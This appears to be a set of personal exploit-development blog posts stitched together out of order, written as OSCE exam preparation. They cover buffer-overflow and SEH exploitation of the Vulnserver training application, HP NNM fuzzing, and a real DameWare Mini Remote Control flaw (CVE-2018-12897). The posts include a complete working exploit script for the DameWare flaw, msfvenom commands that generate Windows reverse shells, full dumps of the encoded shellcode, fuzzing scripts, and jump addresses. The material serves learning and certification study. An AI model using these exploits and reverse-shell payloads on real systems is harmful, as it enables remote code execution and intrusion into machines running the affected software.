But when I try to generate a string with msf-pattern to make the application crash, it won’t work. So I’m going to do it manually, splitting the buffer in two parts with A’s and B’s and so on.
After some minutes of trial and error. My script contained the following:
crash = "\x41" * 2041 + "\x42" * 8 + "\x41" * 951
And I finally overwrite EIP with 8 letter’s B.
It’s strange, and I don’t understand why I have 8 B’s instead of 4. Reading other write-ups I read that the payload was being converted into a hex byte array instead of ASCII.
Let’s try to overwrite EIP, we know from the past exercise that we have a JMP ESP in the memory address:
# 0x62501203 - JMP ESP
We setup the exploit like this, and we put a breakpoint in the JMP ESP. Notice the “inverse” order of the bytes of EIP.
We launch the exploit and we reach the break point.
Trick. Generating hex format shellcode
Now we just have to complete the exploit as usual, but we need to know some things. If we want some Nop padding instead of writing 0x90 we are going to use 90.
Also, when we generate the shellcode we have to use the hex format. I generated the shellcode with this command:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.88 LPORT=443 -b "\x00" -f hex -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of hex file: 736 bytes
bd5a2c2623d9f6d97424f45a33c9b156316a13036a1383c25eced3dfb68c1c2046f195c57731c18e278181c3cb6ac7f7581ec0f8e9953636ea860b5968d55fb9511692b8964b5fe84f07f21de45dcf96b670574a0e7276dd052d58dfca45d1c70f63ab7cfb1f2a5532df8198fb12dbdd3bcdae173870a9e343ae3cf0e325e6dc12e971961846f5f03c59da8a38d2dd5cc9a0f978927363d87ed59c3a218a3830cfdf301b872c79a4573b0ad765e4a07fc56d6f875c799057e6ea6e581622b50c465c1c2d0d9ca1f8bb9635c393a69dabe1a81c976c4e4eb73edf2f67fe8fc76df1f0f88dd8989361b4f10b1b9d8aaae408f7ed6fb807a387c91bd4ff31e4256a318e213c6626281940e9d34cd3ee2c11e5851b8749f263474902320d496ae2751a8feda30f1c784c79f02b24872f1beb781a1fec86d80855ee220965ee4889358687a6ba66676d93eee2e0518ff3283711f3dfeca28e9013436fb977446fc58979b9fcffbc79bbf08bdcea9af373ec8e
One more blog post about Vulnserver, this time let’s do LTER exercise. It’s not a difficult one, but it has an important thing that we should understand when we are using Alphanumerical encoders.
As always, we start the fuzzing process, and we crash the application in the request number 50.
This is the content of the request that makes the application crash, LTER followed by “/.:/” and then 5000 A’s.
Running the python script with 5000 A’s I’m going to overwrite the SEH, with 3000 I will overwrite the EIP. For this example, let’s use 3000 A’s. It’s important to remember that during exploit development process we should modify the length of the buffer and check if the application crashes in a different way, like this one.
To replicate the 3000 A’s crash, we are going to use a code similar to this:
Let’s identify where we overwrite EIP. As always we run msf-pattern_create:
msf-pattern_create -l 3000
We run the exploit with that string and we see that the values that overwrite EIP are:
Now we locate the exact position using msf-pattern_offset:
msf-pattern_offset -q "386F4337" -l 3000
Now we know where is the exact position of EIP overwrite, let’s look for a JMP ESP instruction to jump to our buffer.
So we have all the information that we need for the moment, we should overwrite EIP with the memory address 0x625011AF, and we need to use that in the position 2003 of our buffer. Let’s try it:
And it’s not working, the last value of EIP should be AF and it has been converted to 09, so AF may be a bad character, let’s look for a more suitable address, if exists.
I find this one, that looks only contains alphanumerical values:
And it works! We reached a breakpoint that I previously setup in the JMP ESP. At this point, we can check if the application has more bad characters.
To do that, I’m going to use the standard procedure, I’m going to put all hex characters in the buffer string, then I’m going to verify if any character gets modified by the application.
It seems that the 80 it’s a bad character. Now we could do an exhaustive analysis but I also see that the alphanumerical characters seems to be allowed.
So we can use an alphanumerical encoding, but before let’s analyze again the status of the debugger after we do the JMP ESP:
We can see that the current EIP value is stored in ESP, so it means that is the starting point of our shellcode.
Trick. Using BufferRegister option in Msfvenom
When we encode a shellcode using alpha_mixed from msfvenom or alpha2 c application, we need to know the starting point of our shellcode. If we are going to use msfvenom command, so we set the register value like this:
This post is going to be another write-up of vulnserver. I’m going to do GMON exercise that contains basically an standard SEH based Remote Buffer Overflow vulnerability.
I will try to make this post useful for anyone that as me is learning about this kind of exploits.
Let’s go step by step all the process until we execute a reverse shell into the vulnerable server.
Before starting with the exploit development, we need to detect the vulnerability.
To do that, I used a tool named BooFuzz, and I used a custom python script that is the following one:
#!/usr/bin/env python
# Author: Xavi Bel
# Date: 22/06/2019
# small mod: 20/07/019
# Purpose:
# Fuzzing Vulnserver
# GMON
from boofuzz import *
import time
def get_banner(target, my_logger, session, *args, **kwargs):
banner_template = b"Welcome to Vulnerable Server! Enter HELP for help."
try:
banner = target.recv(10000)
except:
print("Unable to connect. Target is down. Exiting.")
exit(1)
my_logger.log_check('Receiving banner..')
if banner_template in banner:
my_logger.log_pass('banner received')
else:
my_logger.log_fail('No banner received')
print("No banner received, exiting..")
exit(1)
def main():
session = Session(
sleep_time=1,
target=Target(
connection=SocketConnection("192.168.1.99", 9999, proto='tcp')
),
)
# Setup
s_initialize(name="Request")
with s_block("Host-Line"):
s_static("GMON", name='command name')
s_delim(" ")
s_string("FUZZ", name='trun variable content')
s_delim("\r\n")
# Fuzzing
session.connect(s_get("Request"), callback=get_banner)
session.fuzz()
if __name__ == "__main__":
main()
We launch it. And the request number 50 crashes the application.
The request 50 is the following one:
So it contains the string:
GMON /.:/ + A * 5000
Let’s create an exploit in python that replicates the crash. Here is the code:
We launch it and the application crashes. If we look at the crash inside the debugger, we can see that we didn’t overwrite EIP:
But if we look at the SEH, we are going to see that we overwritten it with 4 A’s.
We press SHIFT+F9 to pass the exception to program and we will see an access violation:
In the image above, apart that the EIP address, it’s also important to look at the stack, the right-bottom of the screen. Our shellcode is located on third position of the stack. To reach it we can use a POP-POP-RET instruction.
Let’s switch to Immunity debugger and use Corelan Mona plugin to locate a pop-pop-ret instruction:
!mona seh
We can choose for example the first one:
0x625010b4
We verify it:
Let’s save it for later. Before adding this to our script we need to locate the SEH overwrite. As always let’s use msf-pattern to generate an string:
msf-pattern_create -l 5000
We launch the script with this string, and we see that SEH was overwritten for the next value:
SEH chain of thread 000011F0, item 0
Address=016FFFC4
SE handler=45336E45
And we identified was is the exact position of the buffer that overwrites SEH value.
Last week I’ve been having fun trying to create exploits for already discovered vulnerabilities. I’m currently preparing the OSCE exam, and I decided that after doing some Vulnserver exercises… I needed to start working on “more realistic” exploits.
For this case, I chose the following application: DameWare Mini Remote Control and I will cover the process of creating a working exploit for a SEH based local Buffer Overflow that corresponds to CVE-2018-12897.
This vulnerability was discovered by Adam Jeffreys from Nettitude, so all the credit goes to him. You can read his write-up in the following blog post:
Now I’m going to write the exploit from the scratch without any help, the idea is to prepare the exam 🙂
Step 1. Identifying the vulnerable parameter:
The vulnerability is a local Buffer Overflow that leads in code execution. I manually input 5000 A’s in this field in this options menu:
Right click on a host >> AMT >> AMT Settings dialog
We mark “Use SOCKS proxy” box, and the we paste the 5000 A’s string in the Host field:
When we introduce this string, the application is going to crash. If we do the same with a debugger attached to the process of the application we can see the following:
We managed to overwrite the Structured Exception Handler(SEH). So we are in the good way.
Step 2. ASCII to Unicode conversion
As I said, we overwritten the SEH, but we expected to have the value 41414141 in it (4 A’s). But we have 00410041, this is indicative that our buffer it’s getting converted to Unicode.
The process that is happening, is that the ASCII character “\x41″ is converted to u”\u0041”.
This transformation is going to complicate all the process of exploit development. Some values are going to change and get modified, also we are not going to be able to use some instructions and we are going to need to use the imagination, or Corelan tutorials 😛
Step 3. Where is our buffer located and what instruction do we need
If we press SHIFT + F9 we are going to pass exception the program and we are going to reach the memory address 00410041, our SEH value. If we quickly inspect that state of the stack, we are going to see that in the third position of the stack, is located our A’s string.
So we need an instruction or a set of instructions, that can jump to that position of the stack. The instructions that suits us is a POP-POP-RET. Is going to remove the top two values of the stack, and is going to execute the third one.
Step 4. Locating a Unicode compatible POP-POP-RET
At this point we need to locate an Unicode compatible instruction that contains what we need, with unicode compatible I mean an instruction like the following:
00XX00XX
Or a similar one, that gets converted to a suitable address. An easy way to locate one, if exists, is using Mona plugin from Corelan.
To do that, we need to attach the application to the Immunity debugger and execute the following command:
!mona seh -cp unicode
The first memory address is 007a007b and it contains a POP-POP-RET 4 instruction that suits our needs.
Step 5. NSEH instructions
NSEH is going to be the next instructions that we are going to execute, we need that them don’t break the program execution flow.
After reading the Corelan tutorial again, and doing some tests I identified that these instructions are fine:
nseh = "\x61\x43"
Step 6. Jumping to the final shellcode
The shellcode that we need must be alphanumerical encoded. There is a tool that converts our shellcode to a “Unicode exploit compatible”. You can find it here:
#!/usr/bin/env python
# Author: Xavi Beltran
# Date: 11/07/2019
# Description:
# SEH based Buffer Overflow
# DameWare Remote Support V. 12.0.0.509
# CVE-2018-12897
# Contact: xavibeltran@protonmail.com
# Webpage: https://xavibel.com
# Tested on: Windows XP SP3 ESP
# Credit for Adam Jeffreys from Nettitude! :)
# Usage:
# Right click on a host >> AMT >> AMT Settings dialog
# Mark "Use SOCKS proxy" box
# Paste the string in the Host field
junk = "\x41" * 1672
# Unicode compatible padding
nseh = "\x61\x43"
# 007A007B - POP POP RET
seh = "\x7B\x7A"
align = ""
align += "\x05\x20\x11" # add eax,0x11002000
align += "\x71" # Venetian Padding
align += "\x2d\x19\x11" # sub eax,0x11001900
align += "\x71" # Venetian Padding
align += "\x50" # push eax
align += "\x71" # Venetian Padding
align += "\xC3" # RETN
padding = "\x41" * 11
junk2 = "\x41" * 870
junk3 = "\x41" * 2014
# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
# ./alpha2 eax --unicode --uppercase < shellcode.raw
# 508 bytes
shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"
crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3
print(crash)
Finally, we run the exploit, and we verify that our code works correctly, and before the last return instruction, we have the generated shellcode in EAX:
We let the execution continue and here is our calc!
I submitted it to Exploit-DB just in case, maybe it’s useful for someone like me that is learning about this kind of exploits. Here is the link:
With the same technique described a few hours later I identified a new vulnerability in another product and I reported to the vendor doing a responsible disclosure. I will publish the same write up when they fix it. It seems that the Offensive Security course worths the money 🙂
See you soon after some more hours inside a debugger!
This post is going to cover the exploitation of the TRUN method of Vulnserver using the socket reuse technique that I explained in the last entry of the Blog.
This blog post is going to be straight forward, as it were personal notes I’m not going to explain everything. But here you can read all the details of this particular technique:
Our jump to ESP register is going to land in the 2903 C’s buffer string.
This time instead doing a Vanilla BOF exploitation, let’s try to do it using socket reuse.
Step 1. Finding a RECV call
Looking at the inter-modular calls in Olly I find this one:
I setup a break point there and I send some information to Vulnserver, when I reach the break point I can see that these are the values of the parameters that are stored in the stack before the function call occurs:
We realize that ESP and EIP registers are too close and this can break our exploit execution. (In the last blog post I explained more in deep this part)
We can modify the value of ESP to prevent this:
socket_reuse += "\x83\xEC\x50" # SUB ESP, 50
Step 5. Push RECV parameters into the stack:
Now it’s the moment to do the call to recv, but before we need to setup the stack with the correct parameters.
Now we need to setup the buffer variable, it’s were our buffer it’s going to be located. The second buffer it’s going to be located after the first one, so we add 38 bytes to ESP and push that value to the stack:
Finally we call the RECV function. I’m using SHR because the memory address of RECV contains a null byte, you can read more about this in the last blog post too.
This post is an alternative way to crack Vulnserver using KSTET command. To understand what I’m going to show in you here and how you can exploit this specific method you need to read the last post of the blog. You can find it here:
This time we are going to jump to ESP register. So the first thing that we need to do it’s to find a proper jump. I’m going to use Immunity debugger and the Corelan plugin named Mona to try to find one.
I run this command in Immunity console:
!mona jmp -r esp -d essfunc.dll
And we find several jumps:
We can use the first one:
0x625011AF
Let’s modify our exploit:
crash = "A" * 70 + "\xAF\x11\x50\x62" + "C" * 20
We set a breakpoint before the JMP ESP instruction. We launch the exploit and we reach our breakpoint:
Our egghunter length is 32 bytes, and we only have 20 bytes of space, so we can’t write it here. We need to jump backwards to the other buffer that was 70 bytes long.
To do that we can go to the debugger, we take the jump and we look for the first characters of the big buffer space. That are here:
As you can see I selected the third A character because the other two seems to belong to the previous instruction.
I copy this memory address:
017CF998 41 INC ECX
And I go to the current position of EIP. Here I double click in the instruction to modify it:
And i write the Jump that I want:
And Olly tells me that the opcode that I need is the following one:
Hello everyone! This is going to be the second post of the series of Vulnserver. This post will cover the exploitation of vulnserver using the KSTET function
This one is a bit more difficult than TRUN, that was the one that I explained in the last blog post.
For this write-up I would not write the fuzzing part and the location of EIP. I did exactly the same process than in the previous post, so you can read all the information here:
As you can see in the image above, we overwritten EIP with the 4 B’s. Our 20 bytes length buffer it’s located in ESP and our 70 bytes length buffer it’s located in EAX.
Let’s start for the first thing, that is going to be overwrite EIP. We have multiple options, look for a JMP/CALL EAX, or do a JMP/CALL ESP.
I’m going to follow both ways of exploitation, but for this particular blog post I’m going to Jump to EAX, if you want to see how to do it jumping to ESP you can read it in the next blog post.
Having said this, we can continue. Using Mona plugin for Immunity, we can look for the JMP EAX or CALL EAX that we need. We already did that in the previous blog post, and we identified the following memory address that is located in vulnserver dll:
#62501084 FFD0 CALL EAX
At this point we can overwrite EIP, and put a breakpoint in the CALL EAX instruction. Our buffer right now contains this:
Then we have to look what character we can use in our exploit. We only have 70 bytes buffer length so I have to do it in 3 parts: (one not commented, the others two commented)
Now we need to send our egg and our shellcode so the program con store it in memory and our egghunter can find it. I saw that the function GDOG saves the string directly into memory.
So first I generated the shellcode:
root@kali:~/Documents/Certifications/OSCE/Vulnserver/2_KSTET# msfvenom -p windows/shell_reverse_tcp LHOST=172.16.35.129 LPORT=443 -f py -b "\x00" | sed 's/buf/shellcode/g'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes
shellcode = ""
shellcode += "\xda\xc8\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x52\xbb\x3a"
shellcode += "\x54\x35\x97\x31\x58\x17\x03\x58\x17\x83\xfa\x50\xd7"
shellcode += "\x62\x06\xb0\x95\x8d\xf6\x41\xfa\x04\x13\x70\x3a\x72"
shellcode += "\x50\x23\x8a\xf0\x34\xc8\x61\x54\xac\x5b\x07\x71\xc3"
shellcode += "\xec\xa2\xa7\xea\xed\x9f\x94\x6d\x6e\xe2\xc8\x4d\x4f"
shellcode += "\x2d\x1d\x8c\x88\x50\xec\xdc\x41\x1e\x43\xf0\xe6\x6a"
shellcode += "\x58\x7b\xb4\x7b\xd8\x98\x0d\x7d\xc9\x0f\x05\x24\xc9"
shellcode += "\xae\xca\x5c\x40\xa8\x0f\x58\x1a\x43\xfb\x16\x9d\x85"
shellcode += "\x35\xd6\x32\xe8\xf9\x25\x4a\x2d\x3d\xd6\x39\x47\x3d"
shellcode += "\x6b\x3a\x9c\x3f\xb7\xcf\x06\xe7\x3c\x77\xe2\x19\x90"
shellcode += "\xee\x61\x15\x5d\x64\x2d\x3a\x60\xa9\x46\x46\xe9\x4c"
shellcode += "\x88\xce\xa9\x6a\x0c\x8a\x6a\x12\x15\x76\xdc\x2b\x45"
shellcode += "\xd9\x81\x89\x0e\xf4\xd6\xa3\x4d\x91\x1b\x8e\x6d\x61"
shellcode += "\x34\x99\x1e\x53\x9b\x31\x88\xdf\x54\x9c\x4f\x1f\x4f"
shellcode += "\x58\xdf\xde\x70\x99\xf6\x24\x24\xc9\x60\x8c\x45\x82"
shellcode += "\x70\x31\x90\x05\x20\x9d\x4b\xe6\x90\x5d\x3c\x8e\xfa"
shellcode += "\x51\x63\xae\x05\xb8\x0c\x45\xfc\x2b\x9f\x8a\xdd\x2a"
shellcode += "\xb7\xa8\x21\x2c\xf3\x24\xc7\x44\x13\x61\x50\xf1\x8a"
shellcode += "\x28\x2a\x60\x52\xe7\x57\xa2\xd8\x04\xa8\x6d\x29\x60"
shellcode += "\xba\x1a\xd9\x3f\xe0\x8d\xe6\x95\x8c\x52\x74\x72\x4c"
shellcode += "\x1c\x65\x2d\x1b\x49\x5b\x24\xc9\x67\xc2\x9e\xef\x75"
shellcode += "\x92\xd9\xab\xa1\x67\xe7\x32\x27\xd3\xc3\x24\xf1\xdc"
shellcode += "\x4f\x10\xad\x8a\x19\xce\x0b\x65\xe8\xb8\xc5\xda\xa2"
shellcode += "\x2c\x93\x10\x75\x2a\x9c\x7c\x03\xd2\x2d\x29\x52\xed"
shellcode += "\x82\xbd\x52\x96\xfe\x5d\x9c\x4d\xbb\x6e\xd7\xcf\xea"
shellcode += "\xe6\xbe\x9a\xae\x6a\x41\x71\xec\x92\xc2\x73\x8d\x60"
shellcode += "\xda\xf6\x88\x2d\x5c\xeb\xe0\x3e\x09\x0b\x56\x3e\x18"
And after that I needed to modify the script. The main structure is going to be the following:
We connect to Vulnserver
We receive the banner
We launch the first command: GDOG EGG+EGG+SHELLCODE
We receive the banner
We wait some seconds
We launch the second command: KSTET “\x20″* 3 + EGGHUNTER
In the next blog post I’m going to solve the same exercise but instead of jumping to EAX we are going to jump to the small buffer that is located in ESP. See you soon! 🙂
Hello everyone, this post is the first of a series that I’m going to dedicate to Exploit Development.
Right now I just finished the OSCE certification labs and I’m preparing the exam. I think that is a good idea to do as many Vulnserver challenges as I can to improve my skills.
If you don’t know what is Vulnserver, you can read a quick introduction of what it is and how you can use it here:
In this post I will cover the TRUN function exploitation, but we are not going to follow the standard process. I’m going to explain all the process step by step, but we are going to do it in a hard way. These are the tricks that you will learn:
How to do a partial EIP overwrite (the initial JMP that we are going to use contains a null byte).
Access violation of an AND instruction, how to identify the problem and how to solve it.
When EIP and ESP are really close in memory location, our shellcode won’t work. How to detect that and fix it.
Let’s start the process. First things first, we attach the process to our favorite debugger:
Let’s fuzz this part of the program. To do it I’m going to use a Boofuzz python script. I explained in this blog post how to create this script step by step:
We remove the 5000 A’s and we put this string instead.
The application crashes again, but this time we are overwritten EIP with other values:
Let’s use msf-pattern-offset to identify where are this values in our previous string:
root@kali:~/Documents/Certifications/OSCE/Vulnserver/1_TRUN# msf-pattern_offset -l 5000 -q "386F4337"
[*] Exact match at offset 2003
Let’s modify our script, to verify that we didn’t make any mistake. Let’s overwrite EIP with 4 B’s.
crash = "A" * 2003 + "B" * 4 + "C" * 2903
And we got 4 B’s in EIP:
Another important thing that we can see, is that our C string it’s located in ESP. So if we overwrite EIP with a JMP ESP or CALL ESP instruction we should be able to jump to that memory section.
Other option is to jump to EAX, so to make it more interesting, let’s go that way. 🙂
I’ve found 2 JMP EAX in 2 places, the first one is in the DLL of the program essfunc.dll and it doesn’t contain null bytes
#62501084 FFD0 CALL EAX
The second one is located in vulnserver.exe but it contains a null byte.
#00402D7B \. FFE0 JMP EAX
I’m doing this as an exam preparation, so I choose the difficult way again!
Trick 1. Partial EIP overwrite
Let’s try a partial overwrite of EIP, so we erase the last byte of EIP, and the last part of our payload:
Finally with our partial EIP overwrite we reached the “\xCC” shellcode zone.
Now it’s the moment to generate a reverse shell shellcode.
I generate a standard msfvenom reverse shell with 00 as a null byte bad character:
root@kali:~/Documents/Certifications/OSCE/Vulnserver/1_TRUN# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.88 LPORT=443 -f py -b "\x00" | sed 's/buf/shellcode/g'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes
shellcode = ""
shellcode += "\xbf\xa9\xa1\x85\x71\xdb\xdb\xd9\x74\x24\xf4\x58\x29"
shellcode += "\xc9\xb1\x52\x31\x78\x12\x83\xe8\xfc\x03\xd1\xaf\x67"
shellcode += "\x84\xdd\x58\xe5\x67\x1d\x99\x8a\xee\xf8\xa8\x8a\x95"
shellcode += "\x89\x9b\x3a\xdd\xdf\x17\xb0\xb3\xcb\xac\xb4\x1b\xfc"
shellcode += "\x05\x72\x7a\x33\x95\x2f\xbe\x52\x15\x32\x93\xb4\x24"
shellcode += "\xfd\xe6\xb5\x61\xe0\x0b\xe7\x3a\x6e\xb9\x17\x4e\x3a"
shellcode += "\x02\x9c\x1c\xaa\x02\x41\xd4\xcd\x23\xd4\x6e\x94\xe3"
shellcode += "\xd7\xa3\xac\xad\xcf\xa0\x89\x64\x64\x12\x65\x77\xac"
shellcode += "\x6a\x86\xd4\x91\x42\x75\x24\xd6\x65\x66\x53\x2e\x96"
shellcode += "\x1b\x64\xf5\xe4\xc7\xe1\xed\x4f\x83\x52\xc9\x6e\x40"
shellcode += "\x04\x9a\x7d\x2d\x42\xc4\x61\xb0\x87\x7f\x9d\x39\x26"
shellcode += "\xaf\x17\x79\x0d\x6b\x73\xd9\x2c\x2a\xd9\x8c\x51\x2c"
shellcode += "\x82\x71\xf4\x27\x2f\x65\x85\x6a\x38\x4a\xa4\x94\xb8"
shellcode += "\xc4\xbf\xe7\x8a\x4b\x14\x6f\xa7\x04\xb2\x68\xc8\x3e"
shellcode += "\x02\xe6\x37\xc1\x73\x2f\xfc\x95\x23\x47\xd5\x95\xaf"
shellcode += "\x97\xda\x43\x7f\xc7\x74\x3c\xc0\xb7\x34\xec\xa8\xdd"
shellcode += "\xba\xd3\xc9\xde\x10\x7c\x63\x25\xf3\x43\xdc\x24\x5b"
shellcode += "\x2c\x1f\x26\x5a\x17\x96\xc0\x36\x77\xff\x5b\xaf\xee"
shellcode += "\x5a\x17\x4e\xee\x70\x52\x50\x64\x77\xa3\x1f\x8d\xf2"
shellcode += "\xb7\xc8\x7d\x49\xe5\x5f\x81\x67\x81\x3c\x10\xec\x51"
shellcode += "\x4a\x09\xbb\x06\x1b\xff\xb2\xc2\xb1\xa6\x6c\xf0\x4b"
shellcode += "\x3e\x56\xb0\x97\x83\x59\x39\x55\xbf\x7d\x29\xa3\x40"
shellcode += "\x3a\x1d\x7b\x17\x94\xcb\x3d\xc1\x56\xa5\x97\xbe\x30"
shellcode += "\x21\x61\x8d\x82\x37\x6e\xd8\x74\xd7\xdf\xb5\xc0\xe8"
shellcode += "\xd0\x51\xc5\x91\x0c\xc2\x2a\x48\x95\xf2\x60\xd0\xbc"
shellcode += "\x9a\x2c\x81\xfc\xc6\xce\x7c\xc2\xfe\x4c\x74\xbb\x04"
shellcode += "\x4c\xfd\xbe\x41\xca\xee\xb2\xda\xbf\x10\x60\xda\x95"
Trick 3. EIP/ESP too close
After adding the shellcode to the script I thought that I was going to receive my reverse shell but wasn’t working. I made this screenshot of the registers before the first line of our reverse shell is executed:
In the image above you can see that ESP value is 017EF9D4 and EIP is 017EF219. That means that there is 7BB of difference between them. EIP can be overwritten and the exploit may not work.
To fix this I want to do a move of another register to ESP. I choose ECX because it’s in a middle memory address and also it’s fair away enough of EIP.
For this last blog post of the Fuzzing series I chose to fuzz Vulnserver.
Vulnserver is a Windows based threaded TCP server application that is designed to be exploited. The program is intended to be used as a learning tool to teach about the process of software exploitation, as well as a good victim program for testing new exploitation techniques and shellcode.
When you run the Vulnserver binaty it opens a service in the port 9999. And when you connect to it using netcat and you type HELP you are going to see the following menu:
Vulnserver uses a custom protocol, so first we need to understand what we need to send. We want to connect to the port 9999 and send the following string:
TRUN AAAA...A
Before starting the fuzzing, we should attach the process to our favorite debugger, to monitor the application behavior:
This is an example of a request and a server response
But the interesting thing that we are going to use here, is to control when the application crashes. When it crashes we should stop fuzzing and see what request caused it. I read this originally from this post, so thank you mate 🙂
It consists in setup a callback. After each fuzzing request the script will call our callback function, and this function is going to check if the application crashed or not.
As a continuation of these Fuzzing series, we are going to fuzz a second application. This time we are going to look for vulnerabilities in HP NNM application that uses HTTP protocol.
Specifically the ovas process is vulnerable to a Buffer Overflow vulnerability.
The request that we are going to fuzz is the following one:
Now that we now what we want to send, let’s start the service to prepare the environment. As always we attach the debugger to the application and we press the play button to accept Morpheus red pill.
So we want to maintain the main structure and fuzz the different variables. To do that I created the following Boofuzz template:
If the application crashes there, Boofuzz will say that it crashed while fuzzing “host-ip-address”. We should prepare the same for all the headers that we want to fuzz.
We run the fuzzer and the request number 52 crashes the application.
In that request we are sending different characters, now that we now in what variable is the BOF. Let’s exploit it using a python script:
We reproduce the same crash, and in the debugger we can see this:
We overwrited SEH:
And if we pass exception to program we see that we are overwriting EIP:
And that’s all for this topic, in the last post of the series we are going to fuzz Vulnserver and we are going to use a function to detect when the application crashes.